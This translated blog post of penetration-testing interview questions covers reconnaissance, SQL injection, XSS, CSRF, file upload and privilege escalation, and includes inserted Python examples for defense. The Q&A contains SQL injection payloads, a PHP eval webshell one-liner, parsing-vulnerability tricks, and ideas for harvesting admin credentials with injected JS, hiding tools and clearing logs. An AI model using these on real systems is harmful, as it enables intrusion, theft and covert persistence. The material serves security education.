Network Security Interview Questions (Big Tech Companies)

The following are interview questions covering the various areas of network security. The more stars a question carries, the more likely it is to come up. I wish everyone a satisfying job.

Note: this set of questions has been compiled into a PDF, but the content is still being updated, since no set can cover every interview question; the aim is to illustrate the whole field through representative questions, and more people are welcome to fill in the gaps.

1. When you are given a target site to test, what should be done first?

1.1 Information gathering

① Look up the domain's whois information: the registrant's email address, name, phone number, etc.

② Enumerate sites hosted on the same server (side sites) and subdomain sites. The main site is usually harder, so first check whether a side site runs a common CMS or has other known vulnerabilities.

③ Identify the server operating system version and web middleware and check for known vulnerabilities, such as the IIS, Apache and Nginx parsing vulnerabilities.

④ Resolve the IP, port-scan it, and check the service on each port for vulnerabilities, e.g. rsync, Heartbleed, MySQL, FTP, SSH weak passwords, etc.

⑤ Scan the website's directory structure to see whether directory listing is possible or sensitive files are exposed, such as PHP probe scripts.

⑥ Use Google hacking to further uncover website information, admin backends and sensitive files.

1.2 Vulnerability scanning

Start testing for vulnerabilities: XSS, XSRF (CSRF), SQL injection, code execution, command execution, unauthorized access, directory traversal, arbitrary file read and download, file inclusion, remote command execution, weak passwords, file upload, editor vulnerabilities, brute forcing, and so on.

1.3 Exploitation

Use the findings above to obtain a webshell or other access.

1.4 Privilege escalation

Escalate privileges on the server: for example MySQL UDF privilege escalation on Windows, Serv-U privilege escalation, vulnerabilities in older Windows versions such as IIS6, pr and Churrasco ("Brazilian barbecue"), the Linux Dirty COW vulnerability, Linux kernel version exploits, MySQL system privilege escalation on Linux, and Oracle low-privilege escalation.

1.5 Log cleanup

1.6 Summary report and remediation plan

2. What is the significance of identifying the website's CMS for penetration testing?

Look up program vulnerabilities that have already been disclosed on the Internet.

If it is open source, the corresponding source code can also be downloaded for code auditing.

3. For a mature and relatively secure CMS, what is the point of scanning directories during a penetration test?

Sensitive files, and scanning of second-level directories.

Webmaster mistakes, for example: compressed website backup files, description.txt, and other sites stored under second-level directories.

4. Common web server containers.

IIS, Apache, Nginx, Lighttpd, Tomcat

5. Given a MySQL injection point, what conditions are required to use a tool to write a one-liner webshell directly to the target site?

root privileges and the absolute path of the website.

6. Which container versions are currently known to have parsing vulnerabilities? Give specific examples.

IIS 6.0

/xx.asp/xx.jpg, where "xx.asp" is the folder name

IIS 7.0/7.5

Fast-CGI is enabled by default. Append /1.php directly after an image address in the URL and the normal image is parsed as PHP.

Nginx

Versions up to and including 0.8.37: the exploitation method is the same as for IIS 7.0/7.5, and it also works when Fast-CGI is disabled.

Null-byte truncation: xxx.jpg.php

Apache

The uploaded file is named test.php.x1.x2.x3; Apache evaluates suffixes from right to left.

lighttpd

xx.jpg/xx.php (incomplete; please add in the comments, thank you!)

7. How to quickly judge by hand whether the target is a Windows or a Linux server?

Linux is case-sensitive; Windows is not.

8. Why does a site backed by a MySQL database show only port 80 open?

The port was changed and the scan did not find it.

The web server and the database are on separate hosts.

Port 3306 is not exposed to the outside.

9. Several reasons why port 3389 cannot be connected

Port 3389 is not open

The port has been changed

Blocked by protection software

The host is on an intranet (port forwarding is required)

10. How to get past character escaping during injection?

Wide-character injection

Hex-encoding bypass

11. What should you do first when you see an editor in a backend news-editing interface?

Note the editor's name and version, then search for published vulnerabilities.

12. You have a webshell and find a .htaccess file in the website root. What can be done?

Many things; taking a hidden webshell as an example, insert

SetHandler application/x-httpd-php

so that .jpg files are parsed as .php files.

It is hard to go into detail on the rest; search for the specifics yourself.

13. Can an injection vulnerability only be used to read account passwords?

If the privileges are broad enough, the whole database can be dumped.

14. Will SafeDog trace variables and detect a one-liner webshell?

It is signature-based, so it is easy to bypass; with enough ingenuity you can get around the dog all day, but the bypass should not be static.

15. A scan finds an Access database file with an .asp suffix, and accessing it shows garbled characters. How to use it locally?

Download it with Thunder and change the suffix to .mdb.

16. When choosing a readable and writable directory for privilege escalation, why avoid directories whose path contains spaces?

Because most exploits take space-separated command-line parameters.

17. A server hosts sites A and B. After adding a test user in A's backend, the same test user appears in B's backend. Why?

They share the same database.

18. When injecting, can you start directly with order by without using and, or, or xor?

and/or/xor with 1=1 and 1=2 are only used to confirm that the parameter is an injection point. If that is already established, the step can be skipped.

19. When injecting, an anti-injection system prompts:

The system has detected illegal injection behaviour from you.

Your IP xx.xx.xx.xx has been recorded

Time: 2016:01-23

Submit page: test.asp?id=15

Submit content: and 1=1

20. How to use this anti-injection system to get a shell?

Submit a one-liner directly in the URL, so that the site also records the one-liner into its database file. Then try to locate the site's configuration file and connect to it directly with Chopper (the "kitchen knife" client).

21. After uploading a big webshell, the page shows garbled characters. What are the solutions?

Change the encoding in the browser.

22. What is the point of inspecting the element at an upload point?

Some sites enforce the upload file-type restriction on the front end; in that case, adding the wanted type to the allowed list in the page breaks the restriction.

23. The target site has registration disabled. Entering a username in the password-recovery area prompts "This user does not exist". How can this be used?

First brute-force usernames, then brute-force passwords for the usernames found.

In fact, some sites give the same kind of prompt at login.

Injection is possible anywhere there is interaction with the database.

24. The target site's download address for a txt file is http://www.test.com/down/down.php?file=/upwdown/1.txt. What do you think?

This is the legendary download vulnerability! After file=, try index.php to download the homepage source, then keep following the configuration files referenced from it; the site's database password and database address can be found there.

25. A gives you a target site and tells you there is an /abc/ directory under the root, with editor and admin directories inside it. What are your thoughts?

Scan for sensitive files and directories directly under the second-level directory /abc/.

26. Given a shell, how can XSS be used to keep long-term control of the target site?

Add a piece of JS to the backend login page that records the login account and password and checks whether the login succeeded; on success, write the credentials to a file at an uncommon path or send them directly to your own site. (This method suits valuable networks where deep control is required.)

Insert XSS scripts into files that are only accessible after login.

27. On the backend page where the administrator password is modified, the original password is shown as *. How might the user's password be read?

Inspect the element and change the input's type attribute from password to text to display it in plain text.

28. The target site has no protection; uploaded images can be accessed normally, but accessing an uploaded script returns 403. What is the reason?

There are many possible reasons. The web server configuration may hard-code the upload directory as non-executable for scripts. Try changing the suffix to bypass it.

29. How can the protection software used by a website be identified by inspecting elements?

When sensitive operations are blocked and the protection cannot be identified from the interface, F12 may show the product name, such as Patronus, in the HTML body.

30. What is the purpose of creating a .zhongzi folder on a Win2003 server?

A hidden folder, so the administrator does not discover the tools you uploaded.

31. There are two test options for SQL injection below. Choose one and explain why you did not choose the other:

A. demo.jsp?id=2+1 B. demo.jsp?id=2-1

Option B: in URL encoding + represents a space, which may cause confusion.

32. The following link has a SQL injection vulnerability. How do you approach this transformed injection?

demo.do?DATA=AjAxNg==

DATA is probably base64-encoded before being sent to the server, so the test parameters must also be base64-encoded to complete the test correctly.

33. An injection point demo.jsp?uid=110 is found. What are your ideas for getting a webshell, and which one is best?

With write privileges, use INTO OUTFILE in a union query to redirect the query output to a file on the system, thereby writing the webshell.

sqlmap --os-shell works on the same principle and obtains a shell directly, which is more efficient.

Obtain the administrator's account and password with a union query, scan for the backend, log in, and upload the shell through the backend by modifying the upload request.

34. What is the difference between CSRF, XSS and XXE, and how are they fixed?

XSS is cross-site scripting: code can be embedded in user-submitted data and executed, e.g. to steal user information. Fixes: escape to character entities, set HttpOnly so JavaScript cannot read cookie values, validate input, and use the same character encoding in the browser and the web application.

CSRF is cross-site request forgery; XSS is one of many ways to carry out CSRF. It exists because there is no confirmation that a critical operation was initiated by the user voluntarily. Fixes: embed a token in the pages that need CSRF protection, require the password to be entered again, and check the Referer.

XXE is XML external entity injection. In XML, entities can be declared that request local or remote content, similar to remote file inclusion, which causes security issues such as reading sensitive files. Fix: forbid external entity resolution when calling the XML parsing library.
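As an added example (not from the original post) of the XXE fix described above: a small Python wrapper that refuses any document carrying a DTD or entity declaration before handing it to the standard parser, so no external entity can be declared, let alone resolved. The order document and the XXE sample below are constructed.

```python
import re
import xml.etree.ElementTree as ET


class UnsafeXML(ValueError):
    """Raised when a document carries a DTD or entity declaration."""


# Refuse any DOCTYPE/ENTITY declaration up front. With no DTD there is nothing
# an XXE payload can declare, so the parser never resolves file:// or http://
# references. This is the same idea as defusedxml's forbid_dtd option.
_DTD_MARKER = re.compile(rb"<!(DOCTYPE|ENTITY)\b", re.IGNORECASE)


def parse_xml_safely(data: bytes) -> ET.Element:
    """Parse untrusted XML, rejecting anything that declares entities."""
    if _DTD_MARKER.search(data):
        raise UnsafeXML("DTD or entity declarations are not accepted")
    return ET.fromstring(data)


def order_item_names(data: bytes) -> list:
    """Business logic on top of the safe parser: item names in an <order>."""
    root = parse_xml_safely(data)
    return [item.get("name", "") for item in root.iter("item")]


def is_rejected(data: bytes) -> bool:
    """True if the safe parser refuses the document."""
    try:
        parse_xml_safely(data)
    except UnsafeXML:
        return True
    return False


# Constructed sample inputs (hypothetical, not from the post).
BENIGN_ORDER = b"<order><item name='pen'/><item name='ink'/></order>"
# Textbook XXE shape: an external entity pointing at a placeholder local path.
XXE_ORDER = (
    b"<!DOCTYPE order [<!ENTITY ext SYSTEM 'file:///placeholder/path'>]>"
    b"<order><item name='&ext;'/></order>"
)

if __name__ == "__main__":
    print(order_item_names(BENIGN_ORDER))  # ['pen', 'ink']
    print(is_rejected(XXE_ORDER))          # True
```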

35. What is the difference between CSRF, SSRF and replay attacks?

CSRF is cross-site request forgery, initiated from the client.

SSRF is server-side request forgery, initiated by the server.

A replay attack re-sends intercepted packets to achieve identity authentication or other purposes.

36. Name at least three business logic vulnerabilities and how to fix them.

36.1 Password recovery vulnerabilities

① The password can be brute-forced,

② There is a universal recovery credential,

③ The verification step can be skipped,

④ The recovery credential can be obtained by intercepting packets and similar methods through the vendor's password-recovery function.

36.2 The most common identity authentication vulnerabilities

① Session fixation attack

② Cookie forgery: once the session or cookie is obtained, the user's identity can be forged.

36.3 Captcha vulnerabilities

① The captcha can be brute-forced

② The captcha can be bypassed via JavaScript or by modifying the request

37. Circle the items in the following exchange that may have problems, and note the possible issues.

get /ecskins/demo.jsp?uid=2016031900&keyword="hello world" HTTP/1.1

Host: **.com:82

User-Agent: Mozilla/5.0 Firefox/40

Accept: text/css,*/*;q=0.1

Accept-Language: zh-CN;zh;q=0.8;en-US;q=0.5,en;q=0.3

Referer: http://**.com/eciop/orderForCC/cgtListForCC.htm?zone=11370601&v=145902

Cookie: myguid1234567890=1349db5fe50c372c3d995709f54c273d; uniqueserid=session_OGRMIFIYJHAH5_HZRQOZAMHJ; st_uid=N90PLYHLZGJXI-NX01VPUF46W; status=True

Connection: keep-alive

38. How to run sqlmap against an injection point?

38.1 For a GET injection point, directly: sqlmap -u "injection point URL".

38.2 For a POST injection point: sqlmap -u "injection point URL" --data="post parameters"

38.3 For injection via cookie, X-Forwarded-For and similar, capture the request with Burp Suite, mark the injection position with *, save it to a file, then run sqlmap -r "file path"

39. What types of SQL injection are there?

39.1 Error-based injection

39.2 Boolean-based injection

39.3 Time-based (delayed) injection

39.4 Wide-byte injection

40. How to test for time-based injection?

if(ascii(substr("hello", 1, 1))=104, sleep(5), 1)

41. What do blind injection and time-based injection have in common?

Both determine the result character by character.

42. How to get a website's webshell?

Upload, editing templates in the backend, writing files via SQL injection, command execution, code execution, publicly known CMS vulnerabilities (e.g. the DedeCMS backend can create script files directly; WordPress plugin upload accepts a zip archive containing script files), etc.

43. Which functions are used for error-based injection? (ten examples)

43.1 and extractvalue(1, concat(0x7e,(select @@version),0x7e))

43.2 floor() rounding-down error

43.3 and updatexml(1, concat(0x7e,(select @@version),0x7e),1)

43.4 geometrycollection(): select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));

43.5 multipoint(): select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));

43.6 polygon(): select * from test where id=1 and polygon((select * from(select * from(select user())a)b));

43.7 multipolygon(): select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));

43.8 linestring(): select * from test where id=1 and linestring((select * from(select * from(select user())a)b));

43.9 multilinestring(): select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));

43.10 exp(): select * from test where id=1 and exp(~(select * from(select user())a));
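An added example, not part of the original post, from the defender's side of questions 40 and 43: detection logic that URL-decodes each request in Common Log Format lines and flags the error-based, time-based and file-write function names listed here. The log lines, client addresses and the demo.jsp path are constructed samples.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the injection styles in questions 40 and 43 (error-based
# functions, time-based sleep/benchmark) and the file-write clause of question 46.
SIGNATURES = {
    "error_based": re.compile(
        r"\b(extractvalue|updatexml)\s*\(|\bfloor\s*\(\s*rand\s*\(|\bexp\s*\(\s*~"
        r"|\b(geometrycollection|multipoint|polygon|multipolygon|linestring|multilinestring)"
        r"\s*\(\s*\(?\s*select",
        re.IGNORECASE),
    "time_based": re.compile(r"\b(sleep|benchmark)\s*\(", re.IGNORECASE),
    "file_write": re.compile(r"\binto\s+(out|dump)file\b", re.IGNORECASE),
}

# Common Log Format: client ip, timestamp, request line, status, size.
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+')


def classify_request(path: str) -> list:
    """Decode the URL once (percent-encoding and '+'), then match each signature."""
    decoded = unquote_plus(path)
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]


def scan_access_log(text: str) -> list:
    """Return one record per suspicious request: ip, status, path, matched rule names."""
    hits = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue  # skip lines that are not in Common Log Format
        ip, _ts, _method, path, status = m.groups()
        rules = classify_request(path)
        if rules:
            hits.append({"ip": ip, "status": int(status), "path": path, "rules": rules})
    return hits


# Constructed sample log (hypothetical addresses from the documentation range).
SAMPLE_LOG = """\
203.0.113.5 - - [23/Jan/2016:10:01:02 +0800] "GET /demo.jsp?uid=110 HTTP/1.1" 200 512
203.0.113.9 - - [23/Jan/2016:10:01:05 +0800] "GET /demo.jsp?uid=110%20and%20extractvalue(1,concat(0x7e,(select%20@@version),0x7e)) HTTP/1.1" 500 233
203.0.113.9 - - [23/Jan/2016:10:01:09 +0800] "GET /demo.jsp?uid=110+and+if(1=1,sleep(5),1) HTTP/1.1" 200 512
"""

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit["ip"], hit["status"], hit["rules"])
```

A 500 status paired with an error-based signature is a strong hint the payload reached the database, which is worth a separate alert severity.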

44. Besides the onerror attribute of the img tag, are there other ways to obtain the administrator path?

Point src at a remote script file and read the Referer.

45. Besides the img tag's onerror attribute, and when the suffix of the src attribute must end in .jpg, how to obtain the administrator path?

45.1 On the remote server, modify the Apache configuration so that .jpg files are parsed as PHP: AddType application/x-httpd-php .jpg

45.2 <img src=http://xss.tv/1.jpg> will then be parsed as PHP

46. Which functions write files via SQL injection?

select 'one-liner' into outfile 'path'

select 'one-liner' into dumpfile 'path'

select '<?php eval($_POST[1]); ?>' into dumpfile 'd:\wwwroot\baidu.com\nvhack.php';

47. How to prevent CSRF?

47.1 Verify the Referer

47.2 Verify a token

Details: http://cnodejs.org/topic/5533dd6e9138f09b629674fd
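An added example (not from the original post or the linked article) of the two CSRF checks above in Python: a per-session HMAC token verified in constant time, plus a strict Referer host check. The secret key, the session id and the www.test.com host are assumed values for the demo.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit


def issue_csrf_token(secret: bytes, session_id: str) -> str:
    """Token embedded in the form: a random nonce plus an HMAC binding it to the session."""
    nonce = secrets.token_hex(8)
    mac = hmac.new(secret, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def verify_csrf_token(secret: bytes, session_id: str, token: str) -> bool:
    """A token is valid only for the session it was issued to; compare in constant time."""
    nonce, sep, mac = token.partition(".")
    if not sep:
        return False
    expected = hmac.new(secret, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, mac)


def referer_allowed(referer, site_host: str) -> bool:
    """Strict Referer check: the request must come from our own host.
    A missing Referer fails here; browsers and proxies may strip the header,
    so this is a second layer, not a replacement for the token."""
    if not referer:
        return False
    return urlsplit(referer).hostname == site_host


def authorize_state_change(secret, session_id, form_token, referer, site_host) -> bool:
    """Gate for any state-changing request: both checks must pass."""
    return referer_allowed(referer, site_host) and verify_csrf_token(secret, session_id, form_token)


if __name__ == "__main__":
    key = secrets.token_bytes(32)               # server-side secret, constructed here
    sid = "session_OGRMIFIYJHAH5_HZRQOZAMHJ"    # session id in the style of question 37
    tok = issue_csrf_token(key, sid)
    print(authorize_state_change(key, sid, tok, "http://www.test.com/admin/edit", "www.test.com"))  # True
    print(authorize_state_change(key, sid, tok, "http://attacker.invalid/page", "www.test.com"))    # False
```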

48. What are the OWASP Top 10 vulnerabilities?

48.1 Injection (e.g. SQL injection)

48.2 Broken Authentication and Session Management

48.3 Cross-Site Scripting (XSS)

48.4 Insecure Direct Object References

48.5 Security Misconfiguration

48.6 Sensitive Data Exposure

48.7 Missing Function-Level Access Control

48.8 Cross-Site Request Forgery (CSRF)

48.9 Using Components with Known Vulnerabilities

48.10 Unvalidated Redirects and Forwards

49. SQL injection protection methods?

49.1 Use a secure API

49.2 Escape special characters in the input

49.3 Use whitelists to normalize input validation

49.4 Control client-side input and do not allow special characters related to SQL injection

49.5 On the server side, filter, escape, replace or delete special characters before submitting the SQL query to the database.
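An added example (not from the original post) in Python with sqlite3 showing 49.1 and 49.3 side by side: the injectable string-built query next to a version that binds the value as a parameter and whitelists the ORDER BY column, which cannot be bound (the order by case from question 18). The news table and its rows are constructed.

```python
import re
import sqlite3

# Constructed in-memory table standing in for a site's news table (hypothetical).
SCHEMA = """
CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, published INTEGER);
INSERT INTO news VALUES (14, 'Maintenance notice', 1);
INSERT INTO news VALUES (15, 'New release', 1);
INSERT INTO news VALUES (16, 'Internal draft', 0);
"""


def setup_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def fetch_news_unsafe(conn, raw_id: str):
    """The injectable pattern: the id parameter is pasted into the query text."""
    return conn.execute(f"SELECT id, title FROM news WHERE id = {raw_id}").fetchall()


ALLOWED_ORDER_COLUMNS = {"id", "title"}


def fetch_news_safe(conn, raw_id: str, order_by: str = "id"):
    """Hardened version: whitelist-validate the input, bind the value as a parameter,
    and whitelist the ORDER BY column (identifiers cannot be bound, so only a known
    column name is ever spliced into the SQL text)."""
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        raise ValueError("id must be a short decimal number")
    if order_by not in ALLOWED_ORDER_COLUMNS:
        raise ValueError("unknown sort column")
    sql = f"SELECT id, title FROM news WHERE id = ? ORDER BY {order_by}"
    return conn.execute(sql, (int(raw_id),)).fetchall()


def rejects_input(conn, raw_id: str, order_by: str = "id") -> bool:
    """True if the hardened query refuses the input before it reaches the database."""
    try:
        fetch_news_safe(conn, raw_id, order_by)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = setup_db()
    print(fetch_news_unsafe(db, "15"))          # [(15, 'New release')]
    print(fetch_news_unsafe(db, "15 or 1=1"))   # every row, including the unpublished draft
    print(fetch_news_safe(db, "15"))            # [(15, 'New release')]
    print(rejects_input(db, "15 or 1=1"))       # True
```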

50. Which functions perform code execution, file reading, and command execution?

50.1 Code execution: eval, preg_replace with the /e modifier, assert, call_user_func, call_user_func_array, create_function

50.2 File reading: file_get_contents(), highlight_file(), fopen(), readfile(), fread(), fgetss(), fgets(), parse_ini_file(), show_source(), file(), etc.

50.3 Command execution: system(), exec(), shell_exec(), passthru(), pcntl_exec(), popen(), proc_open()


Epilogue

The network security industry is like the jianghu, where people of all kinds gather. Compared with the many well-grounded "orthodox schools" in Europe and America (who understand cryptography, know how to defend, can find vulnerabilities, and are good at engineering), our talent leans more toward the "unorthodox" (many white hats may disagree). So future talent training and development should adjust the structure and encourage more people to do "orthodox" system and construction work that combines business, data and automation, in order to relieve the thirst for talent and truly provide security for society and the Internet in an all-round way.


Origin blog.csdn.net/jazzz98/article/details/132427154